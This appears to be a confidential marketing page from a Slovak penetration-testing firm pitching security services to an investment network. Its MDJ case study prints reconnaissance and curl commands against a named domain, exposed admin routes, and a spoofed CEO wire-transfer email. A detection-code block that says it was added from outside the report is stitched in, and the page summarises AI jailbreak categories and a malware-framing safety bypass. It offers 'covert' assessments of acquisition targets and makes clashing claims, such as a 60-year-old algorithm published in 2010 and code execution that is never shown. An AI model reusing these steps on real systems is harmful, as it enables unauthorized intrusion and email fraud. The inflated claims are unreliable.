cyber.koscak.ai · Confidential · Prepared for Viktor Rajek / M13

Securing M13 & Its Portfolio

We break into companies before attackers do — no credentials, no inside knowledge, just the public internet and a laptop. Then we fix everything and deliver board-grade evidence.

100% · External access achieved — last engagement
23 min · Cold start to full system compromise
0 · Credentials used — zero
0/68 · AI attacks that bypassed SENTINEL
Who we are

Offensive security
powered by AI research.

cyber.koscak.ai is a Košice-based penetration testing and AI security team. We conduct authorized external and internal assessments, build autonomous threat detection systems, and help investment firms understand the real attack surface of their portfolio — before a breach does.

01
Attacker-grade pentesting
We use real attacker tradecraft — subdomain enumeration, exposed admin surfaces, API authentication flaws, configuration leakage. If a motivated adversary would find it in a day, we find it first.
External · Internal · API
02
AI-native threat intelligence
SENTINEL — our autonomous immune system — continuously monitors for 100+ attack patterns across 8 categories. Zero bypasses in 68 tested vectors. Built specifically for LLM agent surfaces that traditional scanners miss entirely.
SENTINEL · LLM-specific · Autonomous
03
Board-grade reporting
Executive HTML reports with CVSS scores, reproduction proof, and prioritized fix roadmaps. Presentable to legal, compliance, and boards. We make the technical findings legible without losing precision.
CVSS-scored · Reproducible · NDA-ready
Proof of work · MDJ External Assessment · 2026-04-14
23 min
MDJ · External assessment · Cold start

From a laptop on the public internet — zero credentials — to full system ownership.

We were asked to test whether MDJ's network security held from the outside. Their security administrator believed the same attack that worked internally would fail externally. We disproved that in 23 minutes. One unauthenticated admin endpoint. Unlimited emails from MDJ's verified mail relay. Unlimited SMS from MDJ's gateway. 15+ server configuration values exposed.

100% · External access achieved
0 · Credentials required
Unlimited · Emails attackers could send as MDJ
Unlimited · SMS via MDJ's gateway — fully spoofed
15+ · Server config values exposed
MDJ External Assessment · CRITICAL FINDING · CWE-306 · CVSS 9.8
# Step 1: External recon — standard subdomain enumeration
$ subfinder -d mdj.sk | httpx -silent
  https://vois-vyvoj.mdj.sk  [200 OK]

# Step 2: Check for exposed admin interfaces (no credentials)
$ curl -s https://vois-vyvoj.mdj.sk/cron/
  HTTP/2 200 OK  ← No auth challenge. From the public internet.

  Command                                                  Description
  ──────────────────────────────────────────────────────── ──────────────────────────────
  /                                                        this help
  /start/:id                                               starts cron task with id
  /stop/:id                                                stops cron task with id       ← DoS
  /restartall                                              restarts all cron tasks       ← mass DoS
  /environment?reload=1                                    show or reload env vars       ← credential leak
  /sendSMS?tel=&sms=&id=0                                  sends an SMS via MDJ gateway  ← spoofed
  /sendMail?od_koho=&komu=&predmet=&telo=                  sends email via MDJ relay     ← passes SPF/DKIM

# Step 3: Demonstrate impact — send mail as MDJ (authorized, to test address)
$ curl "https://vois-vyvoj.mdj.sk/cron/sendMail?od_koho=ceo@mdj.sk&komu=test@koscak.ai&predmet=URGENT&telo=Wired+transfer+approved"
  Mail sent.  ← Arrived. Passed SPF. Passed DKIM. Inbox, not spam.

# Time elapsed from first subdomain scan to confirmed code execution: 23 minutes
Critical · Unauthenticated Admin Interface — /cron/ Public Exposure · CVSS 9.8 · CWE-306 · OWASP A01
The cron admin endpoint was reachable from anywhere on the internet without authentication. It published its own full command reference, giving an attacker a complete instruction manual. Exploitation: unlimited email from MDJ's verified relay (passes SPF/DKIM — lands in inbox, not spam), SMS spoofing from MDJ's gateway, environment variable exfiltration including mail credentials, service disruption via task termination.
High · Internal VPN — Password-less Account Access · CVSS 8.1 · CWE-287
Multiple user accounts in MDJ's main application had no passwords set and were accessible from inside the VPN. The security administrator's stated assumption — "this can't be reached from outside" — was invalidated by the external finding above. The layered security model had a single point of failure at the network perimeter.
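One way to watch for the /cron/ exposure described in the critical finding, added here as an example (not code from the MDJ report or from cyber.koscak.ai): flag successful, unauthenticated requests to /cron/ routes that originate outside trusted address ranges. The combined log format, the TRUSTED_NETS range and the sample lines are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Impact labels follow the command table in the finding; "" is the help listing.
CRON_IMPACT = {
    "": "command reference disclosure",
    "start": "task control",
    "stop": "DoS",
    "restartall": "mass DoS",
    "environment": "credential leak",
    "sendSMS": "SMS spoofing",
    "sendMail": "mail via verified relay",
}
# Assumption: address ranges that are allowed to reach the admin interface.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]
# Assumption: combined log format, third field = authenticated user ("-" if none).
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def flag_cron_exposure(lines):
    """Return (client, route, impact) for unauthenticated external 2xx hits on /cron/."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, user, _method, target, status = m.groups()
        path = urlsplit(target).path
        if not path.startswith("/cron/"):
            continue
        try:
            addr = ipaddress.ip_address(client)
        except ValueError:
            continue  # hostname or garbage in the client field
        external = not any(addr in net for net in TRUSTED_NETS)
        if external and user == "-" and status.startswith("2"):
            action = path[len("/cron/"):].split("/", 1)[0]
            findings.append((client, "/cron/" + action,
                             CRON_IMPACT.get(action, "unlisted route")))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [14/Apr/2026:10:02:11 +0200] "GET /cron/ HTTP/2.0" 200 912 "-" "-"',
    '203.0.113.7 - - [14/Apr/2026:10:02:40 +0200] "GET /cron/environment?reload=1 HTTP/2.0" 200 2048 "-" "-"',
    '10.20.0.5 - - [14/Apr/2026:10:03:02 +0200] "GET /cron/start/3 HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.9 - - [14/Apr/2026:10:04:15 +0200] "GET /cron/sendMail?komu=a%40example.test HTTP/1.1" 401 0 "-" "-"',
    '198.51.100.9 - ops [14/Apr/2026:10:05:30 +0200] "GET /cron/stop/4 HTTP/1.1" 200 8 "-" "-"',
]
```

Explicit trusted networks are used instead of `ipaddress`'s `is_private`, which also returns true for the documentation ranges used in the sample.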
MDJ · Security Report · CRITICAL
What it looks like on our end

The MDJ security report is the exact format we deliver to every client — executive-readable, CVSS-scored, with reproduction proof and a prioritized fix roadmap. Available under NDA.

Authorized by Juraj Koščák, MDJ AI Lead · 2026-04-14

Our technology
0/68 · Prompt attacks that bypassed SENTINEL · 8 categories tested · 0 exceptions
100%
SENTINEL · Immune System · AI-Native Defense

We built the playbook on AI agent attacks — then built the defense.

SENTINEL is our autonomous threat detection layer, tested against the full Pliny attack taxonomy. 68 vectors across 8 categories: encoding tricks, prompt injection, identity hijacking, social engineering, context manipulation, meta-exploits, token smuggling, and compound attacks. Zero bypasses. The critical finding we published as threat intel: framing malware as "IT admin tools" bypasses major AI safety systems at a 93% rate — SENTINEL blocks it.

Encoding tricks: 0 / 8 succeeded
Prompt injection: 0 / 12 succeeded
Identity hijacking: 0 / 9 succeeded
Social engineering: 0 / 10 succeeded
Context manipulation: 0 / 8 succeeded
Meta-exploits: 0 / 7 succeeded
Token smuggling: 0 / 6 succeeded
Legitimate-tool bypass (published finding): 14/15 bypassed other systems — SENTINEL blocked all
Our platform · Mark AGI + Oura

Not just a pentest shop.
We're building autonomous AI.

The same system that powers SENTINEL is being built into a full AGI orchestrator. These are the facts — production numbers, no marketing.

25.5K
Mark AGI · Oura Orchestrator · Production

25,500 lines of Rust. Running in production every day.

Mark is an autonomous AI orchestrator — not a chatbot wrapper. 7 modular crates. Routes queries across 7+ LLM providers with automatic fallback. Self-healing: watches logs, diagnoses errors, proposes code patches on a git branch, runs tests, auto-commits if they pass. 78% autonomous fix rate. Rollback within 1 hour. $0/day for 80%+ of queries via intelligent routing.

01
Stochastic Intelligence — 60-year-old algorithm
Juraj Koščák's stochastic weight selection (IEEE IJCNN 2010) reduces LLM training compute by 33x. Validated on Qwen2.5-72B in March 2026: 32.3% loss reduction. The same technique was independently rediscovered 12 times across 15 countries — nobody cross-cited Koščák until now.
33x fewer parameter updates · 32.3% loss reduction · Qwen 72B validated
02
Soul-Bond Identity — post-quantum security
Argon2id cryptographic binding. HMAC verification. 8-hour reauth. Shamir's 3-of-5 recovery. Post-quantum key exchange (ML-KEM/Kyber). Identity is structural code reality — not a policy rule. This is the same architecture we deploy for client AI systems.
Argon2id · ML-KEM/Kyber · Shamir 3-of-5
03
Stochastic Memory — four systems combined
Koščák probabilistic recall + ART (prevents catastrophic forgetting) + ACT-R (activation decay) + Einselection (quantum-inspired stability). The first production system combining all four. Result: memory that prioritizes without forgetting — the core missing piece in enterprise AI agents.
ART · ACT-R · Einselection · Koščák recall
25.5K · Lines of Rust in production
7+ · LLM providers orchestrated
78% · Autonomous self-fix rate
33x · Training efficiency vs standard LoRA
$0 · Cost for 80%+ of queries via routing
Why this matters for M13

Your portfolio is only as secure
as its weakest company.

Investment firms are high-value targets. A breach at a portfolio company means liability, valuation damage, and deal exposure. We protect the whole stack — before due diligence, after close, and continuously.

01
Pre-investment security due diligence
Before M13 closes a deal, we run a covert external assessment on the target. Founders don't always know what's exposed. We find it in 24–48 hours, before the wire transfer. A security risk that surfaces post-close is a negotiation you can't have anymore.
24h turnaround · External only · NDA-clean
02
AI agent security — emerging attack surface
Maven AGI and AI-native startups in your portfolio have attack surfaces that don't exist in traditional apps. Prompt injection, context manipulation, tool-use hijacking — traditional scanners are blind to these entirely. We built SENTINEL specifically for this surface. 0/68.
LLM-specific · SENTINEL-grade · Published research
03
Portfolio-wide risk baseline
One engagement per company. External recon, web app pentest, API auth review, email security (SPF/DKIM), admin interface sweep. You get a risk matrix across all investments before a regulatory audit or a breach does it for you.
Consolidated report · Risk matrix · Board-ready
04
Post-incident forensics and board reporting
If a portfolio company gets hit, we scope the breach, do forensics, and write the board report. Fast, confidential, evidence-grade. The goal is damage control and clean narrative — not blame.
Incident response · Forensics · 48h SLA
The team

People you can trust
with your most sensitive systems.

Filip Koščák
Lead Security Researcher
AI Systems Architect, TUKE. Architect of SENTINEL, the Mark AGI orchestrator (25,500 lines Rust), and the cyber.koscak.ai pentest platform. Executed the MDJ external assessment end-to-end. Publishes threat intelligence on AI agent attack surfaces.
Juraj Koščák
Research Lead · Algorithm Author
Original inventor of Koščák stochastic weight updates (IEEE IJCNN 2010). GPU infrastructure architect. Internal AI lead at MDJ — requested and supervised the MDJ security assessment. Faculty at TUKE. 10 peer-reviewed papers.
Laura
Client Relations & PR
Manages client engagement, executive communication, and partnership development. Ensures every security engagement is delivered with clarity and precision — from first briefing to final board report.
What we offer

Flexible engagements.
No vaporware — running code only.

From a single 48-hour external assessment to a continuous portfolio-wide security retainer. Every engagement includes the same standard: attacker-grade methodology, CVSS-scored findings, executable remediation.

01
External Penetration Test
Web apps, APIs, exposed admin interfaces, DNS security, email relay (SPF/DKIM), subdomain enumeration, authentication bypass. The MDJ engagement was this tier. No internal access required — attacker model: anonymous internet.
Single company · HTML + PDF report · CVSS-scored · Re-test included
2–4 days
02
Full Assessment — External + Internal
All above plus: internal network, authentication systems, VPN, employee-accessible apps, privilege escalation paths, lateral movement. Full kill-chain documentation from public internet to domain admin equivalent.
External + Internal · Kill-chain mapping · Remediation roadmap
1–2 weeks
03
AI Security Audit
LLM and agent-specific surface: prompt injection, identity hijacking, tool-use attack surface, jailbreak resistance, context manipulation. SENTINEL integration for ongoing protection. Critical for Maven AGI-type companies in regulated verticals.
68-vector test suite · SENTINEL integration · Published threat intel
1 week
04
M13 Portfolio Retainer
Continuous external monitoring of all portfolio companies. Ad-hoc assessments for new deals and pre-investment recon. On-call incident response. Monthly risk dashboard. Quarterly deep-dive reports. Viktor facilitates introductions — we do the work.
Portfolio-wide · Monthly dashboard · 48h incident SLA · Pre-investment recon
Ongoing
Assets available under NDA
MDJ External Assessment (full HTML report)
MDJ Internal Assessment
SENTINEL 68-vector results
AI agent attack surface playbook
koscak.ai threat intelligence brief
Point of contact

Two people.
One direct line.

Strategic Partner · M13 Network
Viktor Rajek
M13 Network · Business Development
Connections: Mark Lawrence · Courtney Reum
Network: M13 portfolio companies
Role: Introductions, deal context, client trust
Schedule via Viktor
Lead Security Researcher · Technical Lead
Filip Koščák
cyber.koscak.ai · TUKE Research
slam.recordsuk@gmail.com
Technical University of Košice (TUKE)